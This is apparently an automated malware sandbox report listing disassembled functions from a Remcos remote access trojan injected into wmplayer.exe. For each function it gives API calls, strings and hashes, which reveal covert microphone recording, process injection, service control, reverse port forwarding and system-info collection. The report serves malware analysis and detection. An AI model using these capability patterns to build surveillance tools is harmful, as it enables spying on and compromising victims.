                                                                                            • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                            • Opcode Fuzzy Hash: 0dd1757b787a246d8b17c16158875fd6ab15b0531ed3acb572a42c54e3d5a35f
                                                                                            • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                            Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Program Files (x86)\Windows Media Player\wmplayer.exe), ref: 00406705
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CurrentProcess
                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                            • API String ID: 2050909247-4145329354
                                                                                            • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                            • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                            • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                            • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                            Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                            • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                            • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                            • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                            Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00446DDF
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 00446DEB
                                                                                            • _free.LIBCMT ref: 00446DF6
                                                                                            • _free.LIBCMT ref: 00446E01
                                                                                            • _free.LIBCMT ref: 00446E0C
                                                                                            • _free.LIBCMT ref: 00446E17
                                                                                            • _free.LIBCMT ref: 00446E22
                                                                                            • _free.LIBCMT ref: 00446E2D
                                                                                            • _free.LIBCMT ref: 00446E38
                                                                                            • _free.LIBCMT ref: 00446E46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                            • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                            • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                            Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 100059EA
                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                            • _free.LIBCMT ref: 100059F6
                                                                                            • _free.LIBCMT ref: 10005A01
                                                                                            • _free.LIBCMT ref: 10005A0C
                                                                                            • _free.LIBCMT ref: 10005A17
                                                                                            • _free.LIBCMT ref: 10005A22
                                                                                            • _free.LIBCMT ref: 10005A2D
                                                                                            • _free.LIBCMT ref: 10005A38
                                                                                            • _free.LIBCMT ref: 10005A43
                                                                                            • _free.LIBCMT ref: 10005A51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                            • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                            • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                            • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                            Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Eventinet_ntoa
                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                            • API String ID: 3578746661-4192532303
                                                                                            • Opcode ID: a38dbfa5e2e7c27da92c0b528410f9cafb1ec2c8537a7cf768ff9d45ffcb7ab9
                                                                                            • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                            • Opcode Fuzzy Hash: a38dbfa5e2e7c27da92c0b528410f9cafb1ec2c8537a7cf768ff9d45ffcb7ab9
                                                                                            • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                            Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DecodePointer
                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                            • API String ID: 3527080286-3064271455
                                                                                            • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                            • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                            • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                            • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                            Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                            • API String ID: 1462127192-2001430897
                                                                                            • Opcode ID: 6ff8d5af6ff231dab96d0dcea5a4716c226ace1cd344c26e624c75188f411a1b
                                                                                            • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                            • Opcode Fuzzy Hash: 6ff8d5af6ff231dab96d0dcea5a4716c226ace1cd344c26e624c75188f411a1b
                                                                                            • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                            Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                            • API String ID: 3809562944-3643129801
                                                                                            • Opcode ID: a486acdecd70e56ae6275222454893cf0b15f71a35234b0713371b2576243bbe
                                                                                            • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                            • Opcode Fuzzy Hash: a486acdecd70e56ae6275222454893cf0b15f71a35234b0713371b2576243bbe
                                                                                            • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                            Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                            • waveInStart.WINMM ref: 00401A81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                            • String ID: XCG$`=G$x=G
                                                                                            • API String ID: 1356121797-903574159
                                                                                            • Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                            • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                            • Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                            • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                            Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                              • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                              • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                              • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                            • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                            • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                            • String ID: Remcos
                                                                                            • API String ID: 1970332568-165870891
                                                                                            • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                            • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                            • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                            • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                            Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                            • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                            • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                            • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                            Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                            • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                            • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                            • __freea.LIBCMT ref: 00452DAA
                                                                                            • __freea.LIBCMT ref: 00452DB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                            • String ID:
                                                                                            • API String ID: 201697637-0
                                                                                            • Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                            • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                            • Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                            • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                            Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                            • String ID:
                                                                                            • API String ID: 1454806937-0
                                                                                            • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                            • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                            • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                            • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                            Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                            • _free.LIBCMT ref: 00444714
                                                                                            • _free.LIBCMT ref: 0044472D
                                                                                            • _free.LIBCMT ref: 0044475F
                                                                                            • _free.LIBCMT ref: 00444768
                                                                                            • _free.LIBCMT ref: 00444774
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorLast$_abort_memcmp
                                                                                            • String ID: C
                                                                                            • API String ID: 1679612858-1037565863
                                                                                            • Opcode ID: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                            • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                            • Opcode Fuzzy Hash: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                            • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                            Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: tcp$udp
                                                                                            • API String ID: 0-3725065008
                                                                                            • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                            • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                            • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                            • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                            Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ExitThread.KERNEL32 ref: 004017F4
                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                            • __Init_thread_footer.LIBCMT ref: 004017BC
